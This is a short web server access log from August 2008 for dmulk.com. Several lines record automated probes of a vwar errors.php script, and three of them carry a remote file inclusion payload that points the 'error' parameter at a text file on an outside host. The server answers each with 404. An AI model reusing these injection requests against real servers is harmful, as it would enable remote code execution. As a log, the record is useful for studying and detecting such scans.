193.188.66.6 - - [07/Aug/2008:10:37:31 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.188.66.6 - - [07/Aug/2008:10:37:31 -0700] "GET ///vwar/backup/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.188.66.6 - - [07/Aug/2008:10:37:31 -0700] "GET /logs///vwar/backup/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.169.46.98 - - [07/Aug/2008:10:37:32 -0700] "GET /logs/access_080219.log/vwar/backup/errors.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [07/Aug/2008:10:37:32 -0700] "GET /vwar/backup/errors.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [07/Aug/2008:10:37:32 -0700] "GET /logs/vwar/backup/errors.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
74.6.17.183 - - [07/Aug/2008:10:37:33 -0700] "GET /bikes/dteel/2008_01_27/ZbThumbnail.info HTTP/1.0" 200 179511 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
